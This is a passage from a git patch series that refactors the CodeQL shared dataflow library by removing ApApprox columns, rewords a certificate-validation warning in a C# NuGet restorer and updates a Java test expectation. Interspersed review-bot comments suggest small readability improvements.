fwdFlowInFlowThrough(p, state, _, t, ap, stored) } /** @@ -1823,11 +1826,10 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowInCandTypeFlowDisabled( DataFlowCall call, ArgNodeEx arg, FlowState state, Cc outercc, DataFlowCallable inner, - ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, - boolean cc + ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, boolean cc ) { not enableTypeFlow() and - fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, apa, stored, cc) + fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, _, stored, cc) } pragma[nomagic] 
@@ -1862,15 +1864,15 @@ module MakeImpl Lang> { predicate fwdFlowIn( DataFlowCall call, ArgNodeEx arg, DataFlowCallable inner, ParamNodeEx p, FlowState state, Cc outercc, CcCall innercc, SummaryCtx summaryCtx, Typ t, Ap ap, - ApApprox apa, TypOption stored, boolean cc + TypOption stored, boolean cc ) { // type flow disabled: linear recursion fwdFlowInCandTypeFlowDisabled(call, arg, state, outercc, inner, p, summaryCtx, t, ap, - apa, stored, cc) and + stored, cc) and fwdFlowInValidEdgeTypeFlowDisabled(call, inner, innercc, pragma[only_bind_into](cc)) or // type flow enabled: non-linear recursion - exists(boolean emptyAp | + exists(boolean emptyAp, ApApprox apa | fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and fwdFlowInValidEdgeTypeFlowEnabled(call, arg, outercc, inner, p, innercc, emptyAp, apa, cc) @@ -1884,10 +1886,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInNoFlowThrough( - ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap, - TypOption stored + ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap, TypOption stored ) { - FwdFlowInNoThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, stored, _) + FwdFlowInNoThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, stored, _) } private predicate top() { any() } @@ -1896,10 +1897,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInFlowThrough( - ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap, - TypOption stored + ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap, TypOption stored ) { - FwdFlowInThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, stored, _) + FwdFlowInThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, stored, _) } pragma[nomagic] 
@@ -1997,9 +1997,9 @@ module MakeImpl Lang> { DataFlowCall call, DataFlowCallable c, ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap, TypOption stored, boolean cc ) { - FwdFlowInNoThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, stored, cc) + FwdFlowInNoThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, stored, cc) or - FwdFlowInThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, stored, cc) + FwdFlowInThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, stored, cc) } pragma[nomagic] @@ -2070,11 +2070,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRetFromArg( RetNodeEx ret, FlowState state, CcCall ccc, SummaryCtxSome summaryCtx, Typ t, Ap ap, - ApApprox apa, TypOption stored + TypOption stored ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and - fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, apa, stored) and + fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, _, stored) and summaryCtx = TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp), _) and not outBarrier(ret, state) and 
@@ -2087,19 +2087,19 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowThrough0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, + SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx ) { - fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, t, ap, apa, stored) and + fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, t, ap, stored) and fwdFlowIsEntered(call, arg, cc, ccc, summaryCtx, innerSummaryCtx) } pragma[nomagic] private predicate fwdFlowThrough( DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, - Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret + Ap ap, TypOption stored, RetNodeEx ret ) { - fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _) + fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, stored, ret, _) } pragma[nomagic] @@ -2107,7 +2107,7 @@ module MakeImpl Lang> { DataFlowCall call, ArgNodeEx arg, Cc cc, CcCall innerCc, SummaryCtx summaryCtx, ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored ) { - FwdFlowInThrough::fwdFlowIn(call, arg, _, p, state, cc, innerCc, summaryCtx, t, ap, _, + FwdFlowInThrough::fwdFlowIn(call, arg, _, p, state, cc, innerCc, summaryCtx, t, ap, stored, _) } @@ -2143,7 +2143,7 @@ module MakeImpl Lang> { DataFlowCall call, FlowState state, CcCall ccc, Ap ap, RetNodeEx ret, SummaryCtxSome innerSummaryCtx ) { - fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, _, _, ret, innerSummaryCtx) + fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, _, ret, innerSummaryCtx) } pragma[nomagic] 
@@ -3120,11 +3120,11 @@ module MakeImpl Lang> { SummaryCtx outerSummaryCtx, SummaryCtx innerSummaryCtx, Typ t, Ap ap, TypOption stored ) { FwdFlowInNoThrough::fwdFlowIn(_, arg, _, p, state, outercc, innercc, outerSummaryCtx, t, - ap, _, stored, _) and + ap, stored, _) and innerSummaryCtx = TSummaryCtxNone() or FwdFlowInThrough::fwdFlowIn(_, arg, _, p, state, outercc, innercc, outerSummaryCtx, t, - ap, _, stored, _) and + ap, stored, _) and innerSummaryCtx = TSummaryCtxSome(p, state, t, ap, stored) } @@ -3134,7 +3134,7 @@ module MakeImpl Lang> { SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx ) { - fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, _, stored, ret, + fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, stored, ret, innerSummaryCtx) } From 501cbdab3c4e5bdbd6e417d4e5e369dfcfcb3657 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:12:32 +0100 Subject: [PATCH 0976/1267] Dataflow: Remove another ApApprox join and related columns. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 27 +++++++++---------- 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 64630390fec..20ead18e692 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll 
@@ -1717,9 +1717,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowIntoArg( ArgNodeEx arg, FlowState state, Cc outercc, SummaryCtx summaryCtx, Typ t, Ap ap, - boolean emptyAp, ApApprox apa, TypOption stored, boolean cc + boolean emptyAp, TypOption stored, boolean cc ) { - fwdFlow(arg, state, outercc, summaryCtx, t, ap, apa, stored) and + fwdFlow(arg, state, outercc, summaryCtx, t, ap, _, stored) and (if instanceofCcCall(outercc) then cc = true else cc = false) and if ap instanceof ApNil then emptyAp = true else emptyAp = false } @@ -1809,10 +1809,10 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowInCand( DataFlowCall call, ArgNodeEx arg, FlowState state, Cc outercc, DataFlowCallable inner, - ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, boolean emptyAp, ApApprox apa, - TypOption stored, boolean cc + ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, boolean emptyAp, TypOption stored, + boolean cc ) { - fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and + fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, stored, cc) and ( inner = viableImplCallContextReducedInlineLate(call, arg, outercc) or @@ -1829,16 +1829,16 @@ module MakeImpl Lang> { ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, boolean cc ) { not enableTypeFlow() and - fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, _, stored, cc) + fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, stored, cc) } pragma[nomagic] private predicate fwdFlowInCandTypeFlowEnabled( DataFlowCall call, ArgNodeEx arg, Cc outercc, DataFlowCallable inner, ParamNodeEx p, - boolean emptyAp, ApApprox apa, boolean cc + boolean emptyAp, boolean cc ) { enableTypeFlow() and - fwdFlowInCand(call, arg, _, outercc, inner, p, _, _, _, emptyAp, apa, _, cc) + fwdFlowInCand(call, arg, _, outercc, inner, p, _, _, _, emptyAp, _, cc) } pragma[nomagic] 
@@ -1853,9 +1853,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInValidEdgeTypeFlowEnabled( DataFlowCall call, ArgNodeEx arg, Cc outercc, DataFlowCallable inner, ParamNodeEx p, - CcCall innercc, boolean emptyAp, ApApprox apa, boolean cc + CcCall innercc, boolean emptyAp, boolean cc ) { - fwdFlowInCandTypeFlowEnabled(call, arg, outercc, inner, p, emptyAp, apa, cc) and + fwdFlowInCandTypeFlowEnabled(call, arg, outercc, inner, p, emptyAp, cc) and FwdTypeFlow::typeFlowValidEdgeIn(call, inner, cc) and innercc = getCallContextCall(call, inner) } @@ -1872,10 +1872,9 @@ module MakeImpl Lang> { fwdFlowInValidEdgeTypeFlowDisabled(call, inner, innercc, pragma[only_bind_into](cc)) or // type flow enabled: non-linear recursion - exists(boolean emptyAp, ApApprox apa | - fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and - fwdFlowInValidEdgeTypeFlowEnabled(call, arg, outercc, inner, p, innercc, emptyAp, apa, - cc) + exists(boolean emptyAp | + fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, stored, cc) and + fwdFlowInValidEdgeTypeFlowEnabled(call, arg, outercc, inner, p, innercc, emptyAp, cc) ) } } From 684c80c31a1fd828b9f1fc16225b9c21a828934e Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 10 Dec 2024 13:13:11 +0100 Subject: [PATCH 0977/1267] C#: Address review comments. --- .../NugetPackageRestorer.cs | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 17547a0ec87..393e37579b7 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs 
@@ -606,7 +606,12 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { if (chain is null || cert is null) { - logger.LogWarning("Certificate validation trivially failed due to missing chain or certificate."); + var msg = cert is null && chain is null + ? "certificate and chain" + : chain is null + ? "chain" + : "certificate"; + logger.LogWarning($"Dependabot proxy certificate validation failed due to missing {msg}"); return false; } chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; From 231bf9d1c9e0fdf0c30300112501fe8a882a5591 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:20:27 +0100 Subject: [PATCH 0978/1267] Dataflow: Drop ApApprox join in fwdFlowStore. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 31 +++++++++---------- 1 file changed, 14 insertions(+), 17 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 20ead18e692..426c6200e90 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -877,13 +877,11 @@ module MakeImpl Lang> { pragma[nomagic] predicate storeStepCand( - NodeEx node1, Ap ap1, Content c, NodeEx node2, DataFlowType contentType, - DataFlowType containerType + NodeEx node1, Content c, NodeEx node2, DataFlowType contentType, DataFlowType containerType ) { revFlowIsReadAndStored(c) and revFlow(node2) and - store(node1, c, node2, contentType, containerType) and - exists(ap1) + store(node1, c, node2, contentType, containerType) } pragma[nomagic] 
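Review bot: In the null guard of NugetPackageRestorer.cs the new local `msg` holds only the name of the missing input, not a message, and the nested conditional takes a second read to follow. Something like `var missing = (cert, chain) switch { (null, null) => "certificate and chain", (_, null) => "chain", _ => "certificate" };` says the same thing more directly, if the project's language version allows switch expressions. Since this looks like a server-certificate check for the Dependabot proxy, a short comment on the `return false;` line noting that a missing chain or certificate is deliberately treated as a validation failure would help later readers. The rest of the method lies outside the hunk, so how the custom root trust set on the last visible line is populated and checked cannot be confirmed from here.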
@@ -1292,8 +1290,7 @@ module MakeImpl Lang> { predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind); predicate storeStepCand( - NodeEx node1, Ap ap1, Content c, NodeEx node2, DataFlowType contentType, - DataFlowType containerType + NodeEx node1, Content c, NodeEx node2, DataFlowType contentType, DataFlowType containerType ); predicate readStepCand(NodeEx n1, Content c, NodeEx n2); @@ -1451,7 +1448,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate compatibleContainer0(ApHeadContent apc, DataFlowType containerType) { exists(DataFlowType containerType0, Content c | - PrevStage::storeStepCand(_, _, c, _, _, containerType0) and + PrevStage::storeStepCand(_, c, _, _, containerType0) and not isTopType(containerType0) and compatibleTypesCached(containerType0, containerType) and apc = projectToHeadContent(c) @@ -1461,7 +1458,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate topTypeContent(ApHeadContent apc) { exists(DataFlowType containerType0, Content c | - PrevStage::storeStepCand(_, _, c, _, _, containerType0) and + PrevStage::storeStepCand(_, c, _, _, containerType0) and isTopType(containerType0) and apc = projectToHeadContent(c) ) 
@@ -1646,11 +1643,11 @@ module MakeImpl Lang> { NodeEx node1, Typ t1, Ap ap1, TypOption stored1, Content c, Typ t2, TypOption stored2, NodeEx node2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { - exists(DataFlowType contentType, DataFlowType containerType, ApApprox apa1 | - fwdFlow(node1, state, cc, summaryCtx, t1, ap1, apa1, stored1) and + exists(DataFlowType contentType, DataFlowType containerType | + fwdFlow(node1, state, cc, summaryCtx, t1, ap1, _, stored1) and not outBarrier(node1, state) and not inBarrier(node2, state) and - PrevStage::storeStepCand(node1, apa1, c, node2, contentType, containerType) and + PrevStage::storeStepCand(node1, c, node2, contentType, containerType) and t2 = getTyp(containerType) and // We need to typecheck stores here, since reverse flow through a getter // might have a different type here compared to inside the getter. @@ -2443,11 +2440,11 @@ module MakeImpl Lang> { pragma[nomagic] predicate storeStepCand( - NodeEx node1, Ap ap1, Content c, NodeEx node2, DataFlowType contentType, + NodeEx node1, Content c, NodeEx node2, DataFlowType contentType, DataFlowType containerType ) { - exists(Ap ap2 | - PrevStage::storeStepCand(node1, _, c, node2, contentType, containerType) and + exists(Ap ap2, Ap ap1 | + PrevStage::storeStepCand(node1, c, node2, contentType, containerType) and revFlowStore(ap2, c, ap1, node1, _, node2, _, _) and revFlowConsCand(ap2, c, ap1) ) @@ -2664,7 +2661,7 @@ module MakeImpl Lang> { or node instanceof OutNodeEx or - storeStepCand(_, _, _, node, _, _) + storeStepCand(_, _, node, _, _) or readStepCand(_, _, node) or @@ -2698,7 +2695,7 @@ module MakeImpl Lang> { callEdgeReturn(_, _, node, _, next, _) and apNext = ap or - storeStepCand(node, _, _, next, _, _) + storeStepCand(node, _, next, _, _) or readStepCand(node, _, next) ) 
@@ -3950,7 +3947,7 @@ module MakeImpl Lang> { PrevStage::readStepCand(_, pragma[only_bind_into](c), _) and c = cs.getAReadContent() and clearSet(node, cs) and - if PrevStage::storeStepCand(_, _, _, node, _, _) + if PrevStage::storeStepCand(_, _, node, _, _) then isStoreTarget = true else isStoreTarget = false ) From 4e155f8542c4dcfb4216d078c34e6f69fabd52f5 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:23:51 +0100 Subject: [PATCH 0979/1267] Dataflow: Insert a few getApprox calls to remove ApApprox from fwdFlow. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 85 ++++++++++--------- 1 file changed, 43 insertions(+), 42 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 426c6200e90..56bf5530704 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll 
@@ -1479,26 +1479,27 @@ module MakeImpl Lang> { */ pragma[nomagic] additional predicate fwdFlow( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, - TypOption stored + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { - fwdFlow1(node, state, cc, summaryCtx, _, t, ap, apa, stored) + fwdFlow1(node, state, cc, summaryCtx, _, t, ap, stored) } private predicate fwdFlow1( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Typ t, Ap ap, - ApApprox apa, TypOption stored + TypOption stored ) { - fwdFlow0(node, state, cc, summaryCtx, t0, ap, apa, stored) and - PrevStage::revFlow(node, state, apa) and - filter(node, state, t0, ap, t) and - ( - if node instanceof CastingNodeEx - then - ap instanceof ApNil or - compatibleContainer(getHeadContent(ap), node.getDataFlowType()) or - topTypeContent(getHeadContent(ap)) - else any() + exists(ApApprox apa | + fwdFlow0(node, state, cc, summaryCtx, t0, ap, apa, stored) and + PrevStage::revFlow(node, state, apa) and + filter(node, state, t0, ap, t) and + ( + if node instanceof CastingNodeEx + then + ap instanceof ApNil or + compatibleContainer(getHeadContent(ap), node.getDataFlowType()) or + topTypeContent(getHeadContent(ap)) + else any() + ) ) } @@ -1516,7 +1517,8 @@ module MakeImpl Lang> { stored.isNone() or exists(NodeEx mid, FlowState state0, Typ t0, LocalCc localCc | - fwdFlow(mid, state0, cc, summaryCtx, t0, ap, apa, stored) and + fwdFlow(mid, state0, cc, summaryCtx, t0, ap, stored) and + apa = getApprox(ap) and localCc = getLocalCc(cc) | localStep(mid, state0, node, state, true, _, localCc, _) and @@ -1526,7 +1528,8 @@ module MakeImpl Lang> { ap instanceof ApNil ) or - fwdFlowJump(node, state, t, ap, apa, stored) and + fwdFlowJump(node, state, t, ap, stored) and + apa = getApprox(ap) and cc = ccNone() and summaryCtx = TSummaryCtxNone() or 
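Review bot: `fwdFlow1` is declared without any QLDoc, and after this change its `exists(ApApprox apa | ...)` is the only place in the first hunk that still uses the approximation, which deserves a comment. Something like `// apa is only needed to prune against PrevStage::revFlow; it is no longer a column of fwdFlow` above the `exists` would save the next reader from tracing it. In the two later hunks, the added `apa = getApprox(ap)` conjuncts bind `apa` from `ap` alone, which suggests `fwdFlow0` could eventually drop the column too. The rest of `fwdFlow0` lies outside these hunks, so that is only an inference.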
@@ -1615,23 +1618,21 @@ module MakeImpl Lang> { override Location getLocation() { result = p.getLocation() } } - private predicate fwdFlowJump( - NodeEx node, FlowState state, Typ t, Ap ap, ApApprox apa, TypOption stored - ) { + private predicate fwdFlowJump(NodeEx node, FlowState state, Typ t, Ap ap, TypOption stored) { exists(NodeEx mid | - fwdFlow(mid, state, _, _, t, ap, apa, stored) and + fwdFlow(mid, state, _, _, t, ap, stored) and jumpStepEx(mid, node) ) or exists(NodeEx mid | - fwdFlow(mid, state, _, _, _, ap, apa, stored) and + fwdFlow(mid, state, _, _, _, ap, stored) and additionalJumpStep(mid, node, _) and t = getNodeTyp(node) and ap instanceof ApNil ) or exists(NodeEx mid, FlowState state0 | - fwdFlow(mid, state0, _, _, _, ap, apa, stored) and + fwdFlow(mid, state0, _, _, _, ap, stored) and additionalJumpStateStep(mid, state0, node, state, _) and t = getNodeTyp(node) and ap instanceof ApNil @@ -1644,7 +1645,7 @@ module MakeImpl Lang> { NodeEx node2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { exists(DataFlowType contentType, DataFlowType containerType | - fwdFlow(node1, state, cc, summaryCtx, t1, ap1, _, stored1) and + fwdFlow(node1, state, cc, summaryCtx, t1, ap1, stored1) and not outBarrier(node1, state) and not inBarrier(node2, state) and PrevStage::storeStepCand(node1, c, node2, contentType, containerType) and @@ -1685,7 +1686,7 @@ module MakeImpl Lang> { Cc cc, SummaryCtx summaryCtx ) { exists(ApHeadContent apc | - fwdFlow(node1, state, cc, summaryCtx, t, ap, _, stored) and + fwdFlow(node1, state, cc, summaryCtx, t, ap, stored) and not outBarrier(node1, state) and not inBarrier(node2, state) and apc = getHeadContent(ap) and 
@@ -1716,7 +1717,7 @@ module MakeImpl Lang> { ArgNodeEx arg, FlowState state, Cc outercc, SummaryCtx summaryCtx, Typ t, Ap ap, boolean emptyAp, TypOption stored, boolean cc ) { - fwdFlow(arg, state, outercc, summaryCtx, t, ap, _, stored) and + fwdFlow(arg, state, outercc, summaryCtx, t, ap, stored) and (if instanceofCcCall(outercc) then cc = true else cc = false) and if ap instanceof ApNil then emptyAp = true else emptyAp = false } @@ -1940,7 +1941,7 @@ module MakeImpl Lang> { ) { instanceofCcNoCall(cc) and not outBarrier(ret, state) and - fwdFlow(ret, state, cc, summaryCtx, t, ap, _, stored) + fwdFlow(ret, state, cc, summaryCtx, t, ap, stored) } pragma[nomagic] @@ -2003,7 +2004,7 @@ module MakeImpl Lang> { ParamNodeEx p, FlowState state, CcCall cc, Typ t0, Ap ap, TypOption stored ) { instanceofCcCall(cc) and - fwdFlow1(p, state, cc, _, t0, _, ap, _, stored) + fwdFlow1(p, state, cc, _, t0, _, ap, stored) } pragma[nomagic] @@ -2026,7 +2027,7 @@ module MakeImpl Lang> { private predicate fwdFlow1Out( NodeEx node, FlowState state, Cc cc, Typ t0, Ap ap, TypOption stored ) { - fwdFlow1(node, state, cc, _, t0, _, ap, _, stored) and + fwdFlow1(node, state, cc, _, t0, _, ap, stored) and PrevStage::callEdgeReturn(_, _, _, _, node, _) } @@ -2048,7 +2049,7 @@ module MakeImpl Lang> { or exists(NodeEx node | cc = false and - fwdFlowJump(node, _, _, _, _, _) and + fwdFlowJump(node, _, _, _, _) and c = node.getEnclosingCallable() ) } @@ -2070,7 +2071,7 @@ module MakeImpl Lang> { ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and - fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, _, stored) and + fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, stored) and summaryCtx = TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp), _) and not outBarrier(ret, state) and 
@@ -2164,7 +2165,7 @@ module MakeImpl Lang> { returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), pragma[only_bind_into](argAp), pragma[only_bind_into](argStored), ap) and flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, emptyArgAp) and - fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), _, + fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), pragma[only_bind_into](argStored)) and if argAp instanceof ApNil then emptyArgAp = true else emptyArgAp = false ) @@ -2176,7 +2177,7 @@ module MakeImpl Lang> { ) { exists(boolean emptyAp | flowIntoCallApaTaken(call, c, arg, p, emptyAp) and - fwdFlow(arg, _, _, _, _, ap, _, _) and + fwdFlow(arg, _, _, _, _, ap, _) and if ap instanceof ApNil then emptyAp = true else emptyAp = false ) } @@ -2187,7 +2188,7 @@ module MakeImpl Lang> { Ap ap, boolean allowsFieldFlow ) { PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow) and - fwdFlow(ret, _, _, _, _, ap, _, _) and + fwdFlow(ret, _, _, _, _, ap, _) and pos = ret.getReturnPosition() and (if allowsFieldFlow = false then ap instanceof ApNil else any()) and ( @@ -2210,14 +2211,14 @@ module MakeImpl Lang> { NodeEx node, FlowState state, ReturnCtx returnCtx, ApOption returnAp, Ap ap ) { revFlow0(node, state, returnCtx, returnAp, ap) and - fwdFlow(node, state, _, _, _, ap, _, _) + fwdFlow(node, state, _, _, _, ap, _) } pragma[nomagic] private predicate revFlow0( NodeEx node, FlowState state, ReturnCtx returnCtx, ApOption returnAp, Ap ap ) { - fwdFlow(node, state, _, _, _, ap, _, _) and + fwdFlow(node, state, _, _, _, ap, _) and sinkNode(node, state) and ( if hasSinkCallCtx() 
@@ -2345,7 +2346,7 @@ module MakeImpl Lang> { predicate dataFlowNonCallEntry(DataFlowCallable c, boolean cc) { exists(NodeEx node, FlowState state, ApNil nil | - fwdFlow(node, state, _, _, _, nil, _, _) and + fwdFlow(node, state, _, _, _, nil, _) and sinkNode(node, state) and (if hasSinkCallCtx() then cc = true else cc = false) and c = node.getEnclosingCallable() @@ -2520,7 +2521,7 @@ module MakeImpl Lang> { exists(Ap ap0 | parameterMayFlowThrough(p, _) and revFlow(n, state, TReturnCtxMaybeFlowThrough(_), _, ap0) and - fwdFlow(n, state, any(CcCall ccc), TSummaryCtxSome(p, _, _, ap, _), _, ap0, _, _) + fwdFlow(n, state, any(CcCall ccc), TSummaryCtxSome(p, _, _, ap, _), _, ap0, _) ) } @@ -2812,7 +2813,7 @@ module MakeImpl Lang> { NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { - fwdFlow(node, state, cc, summaryCtx, t, ap, _, stored) and + fwdFlow(node, state, cc, summaryCtx, t, ap, stored) and revFlow(node, state, _, _, ap) } or TPathNodeSink(NodeEx node, FlowState state) { @@ -3148,7 +3149,7 @@ module MakeImpl Lang> { TypOption stored ) { exists(Typ t | - fwdFlow1(node, state, cc, summaryCtx, t0, t, ap, _, stored) and + fwdFlow1(node, state, cc, summaryCtx, t0, t, ap, stored) and result = TPathNodeMid(node, state, cc, summaryCtx, t, ap, stored) ) } 
@@ -3598,13 +3599,13 @@ module MakeImpl Lang> { int tfnodes, int tftuples ) { fwd = true and - nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _, _)) and + nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _)) and fields = count(Content f0 | fwdConsCand(f0, _)) and conscand = count(Content f0, Ap ap | fwdConsCand(f0, ap)) and - states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _, _)) and + states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _)) and tuples = count(NodeEx n, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, - TypOption stored | fwdFlow(n, state, cc, summaryCtx, t, ap, _, stored)) and + TypOption stored | fwdFlow(n, state, cc, summaryCtx, t, ap, stored)) and calledges = count(DataFlowCall call, DataFlowCallable c | FwdTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) or From 40f77136787ab75491b604b9e6a7bfaa2b1f6f00 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:28:43 +0100 Subject: [PATCH 0980/1267] Dataflow: Minor simplification. --- shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 56bf5530704..6ead5b71906 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -2043,7 +2043,7 @@ module MakeImpl Lang> { exists(NodeEx node, FlowState state | sourceNode(node, state) and (if hasSourceCallCtx() then cc = true else cc = false) and - PrevStage::revFlow(node, state, getApprox(any(ApNil nil))) and + PrevStage::revFlow(node, state, any(PrevStage::ApNil nil)) and c = node.getEnclosingCallable() ) or From da179705c393598d6c15d57b5a266b397e3232ac Mon Sep 17 00:00:00 2001 
From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 14:52:06 +0100 Subject: [PATCH 0981/1267] Java: Accept expected file changes. --- .../test/library-tests/dataflow/capture/inlinetest.expected | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/java/ql/test/library-tests/dataflow/capture/inlinetest.expected b/java/ql/test/library-tests/dataflow/capture/inlinetest.expected index d127b92ddaf..a336577503f 100644 --- a/java/ql/test/library-tests/dataflow/capture/inlinetest.expected +++ b/java/ql/test/library-tests/dataflow/capture/inlinetest.expected 
